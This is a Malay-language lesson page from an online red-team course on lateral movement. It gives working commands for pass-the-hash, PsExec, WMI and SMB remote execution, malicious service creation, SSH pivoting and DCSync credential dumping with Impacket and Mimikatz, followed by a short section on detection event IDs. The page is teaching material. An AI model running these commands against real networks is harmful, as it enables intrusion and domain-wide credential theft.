Cyber Security Academy · Pelajaran

Teknik Pergerakan Lateral

Bergerak melalui rangkaian menggunakan WMI, PsExec, WinRM dan perkongsian SMB tanpa mencetuskan amaran.

Pelajaran 3 daripada 413 langkah

Teknik Pergerakan Lateral ialah pelajaran Cyber Security Academy percuma di CoddyKit. Ini ialah pelajaran 3 daripada 4. Sebanyak 3 pelajaran dalam laluan pembelajaran ini boleh dibaca sepenuhnya secara percuma — selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan praktikal dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Pelajaran ini merupakan sebahagian daripada laluan pembelajaran Cyber Security Academy, dan kemajuan anda disegerakkan merentas web serta aplikasi CoddyKit. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Apakah Pergerakan Lateral?

Pergerakan lateral ialah himpunan teknik yang digunakan penyerang untuk bergerak secara berperingkat melalui rangkaian selepas pencerobohan awal — berpindah daripada titik mula pertama menuju sasaran bernilai lebih tinggi seperti pengawal domain, pangkalan data dan sistem sandaran.

Laluan melalui Cincangan (PtH)

Pengesahan Windows NTLM membolehkan penggunaan cincangan kata laluan secara langsung dan bukannya kata laluan teks biasa. Penyerang yang telah mengekstrak cincangan NTLM boleh mengesahkan identiti kepada sistem lain tanpa memecahkan cincangan tersebut.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

Laluan melalui Tiket (PtT)

Tiket Kerberos (TGT atau TGS) boleh diekstrak daripada memori dan diimport untuk mengesahkan identiti sebagai pemegang tiket. Serangan Tiket Emas memalsukan TGT menggunakan cincangan KRBTGT, lalu memberikan akses Kerberos tanpa had kepada domain.

Pelaksanaan Kod Jauh: PSExec

psexec (Sysinternals dan Impacket) melaksanakan perintah pada hos Windows jauh melalui perkongsian SMB/pentadbir. Kelayakan pentadbir diperlukan. Perintah ini mencipta binari perkhidmatan pada sasaran.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

Pergerakan Lateral WMI

Instrumentasi Pengurusan Windows membolehkan pelaksanaan kod jauh tanpa mencipta fail yang dapat dikesan oleh banyak alat:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB dan Perkongsian Pentadbir

Perkongsian pentadbir Windows (C$, ADMIN$, IPC$) membolehkan pergerakan lateral menggunakan kelayakan pentadbir:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

Perkhidmatan Jauh: sc dan at

Cipta perkhidmatan atau tugas berjadual pada sistem jauh:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP dan Sesi Interaktif

RDP (Protokol Desktop Jauh, port 3389) menyediakan akses interaktif penuh. Penyerang menggunakan RDP dengan kelayakan yang dicuri. Pertahanan: hadkan RDP kepada pelayan lompat, wajibkan NLA dan rekodkan semua sesi.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH sebagai Pergerakan Lateral

Dalam persekitaran Linux, SSH dengan kunci atau kelayakan yang dicuri membolehkan pergerakan lateral. Penyalahgunaan pemajuan ejen membolehkan penyerang berpindah melalui hos yang telah terjejas. Terowong SSH memajukan port untuk mencapai sistem yang sebaliknya tidak boleh diakses.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

Replikasi Active Directory (DCSync)

DCSync menyalahgunakan replikasi AD untuk mengambil cincangan kata laluan secara langsung daripada DC tanpa menjalankan kod padanya — memerlukan keistimewaan DS-Replication-Get-Changes-All:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

Mengesan Pergerakan Lateral

Petunjuk pengesanan:

  • Peristiwa 4624 (log masuk) dengan log masuk Jenis 3 (rangkaian) yang luar biasa
  • Penciptaan perkhidmatan pada hos jauh (Peristiwa 7045)
  • Sambungan SMB antara stesen kerja
  • Penciptaan proses WMI pada hos jauh
  • Tingkah laku akaun yang tidak normal (pengguna log masuk dari berbilang mesin)

Semakan Pantas: Pergerakan Lateral

Teknik manakah yang membolehkan penyerang mengesahkan identiti kepada sistem Windows menggunakan cincangan NTLM yang ditangkap tanpa memecahkannya?

Ringkasan Pelajaran

Pergerakan lateral menggunakan kelayakan dan protokol yang telah terjejas untuk merebak melalui rangkaian. Teknik utama: laluan melalui cincangan (penggunaan semula cincangan NTLM), laluan melalui tiket (Kerberos), PSExec/WMI/SMB untuk pelaksanaan jauh dan DCSync untuk pemerolehan kelayakan domain. Pengesanan: log masuk rangkaian yang luar biasa (Peristiwa 4624), penciptaan perkhidmatan jauh (Peristiwa 7045) dan trafik SMB antara stesen kerja.

Percuma untuk bermula

Pelajari Cyber Security Academy dengan tutor kecerdasan buatan — percuma

Tulis dan jalankan kod sebenar dalam pelayar anda, dapatkan bantuan segera daripada tutor kecerdasan buatan yang tersedia 24/7, dan sambung semula dari tempat anda berhenti di web atau dalam aplikasi.

Kursus
76
Pelajaran
303

Soalan Lazim

Adakah pelajaran “Teknik Pergerakan Lateral” percuma?

Ya — sebanyak 3 pelajaran dalam laluan pembelajaran Cyber Security Academy, termasuk “Teknik Pergerakan Lateral”, boleh dibaca sepenuhnya secara percuma di web ini. Selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan interaktif dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Apakah yang akan saya pelajari dalam “Teknik Pergerakan Lateral”?

Bergerak melalui rangkaian menggunakan WMI, PsExec, WinRM dan perkongsian SMB tanpa mencetuskan amaran. Anda berlatih Cyber Security Academy menggunakan kod praktikal yang dijalankan terus dalam pelayar, manakala tutor kecerdasan buatan 24/7 menjawab soalan anda semasa anda mengikuti pelajaran.

Adakah saya memerlukan pengalaman untuk memulakan Cyber Security Academy?

Tiada pengalaman terdahulu diperlukan. Pembelajaran Cyber Security Academy di CoddyKit disusun untuk pelajar daripada peringkat pemula hingga lanjutan, jadi anda boleh bermula di sini atau dari awal dan belajar mengikut kadar anda sendiri. Ini ialah pelajaran 3 daripada 4.

Berapa lamakah pelajaran “Teknik Pergerakan Lateral” diambil?

Kebanyakan pelajaran CoddyKit mengambil masa kira-kira 5–10 minit. Setiap pelajaran ringkas dan interaktif, jadi anda boleh membuat kemajuan secara berterusan dan menyambung tepat dari tempat anda berhenti di web atau aplikasi.

Bolehkah saya menulis dan menjalankan kod dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan penyunting kod terbina dalam, jadi anda boleh menulis dan menjalankan kod sebenar terus dalam pelayar serta menerima maklum balas kecerdasan buatan serta-merta — tanpa memerlukan persediaan setempat.

Semua pelajaran dalam kursus ini

  1. Rangka Kerja C2: Cobalt Strike dan Sliver
  2. Binari Living-Off-the-Land (LOLBins)
  3. Teknik Pergerakan Lateral
  4. Penulisan Laporan Pasukan Merah
← Kembali ke Cyber Security Academy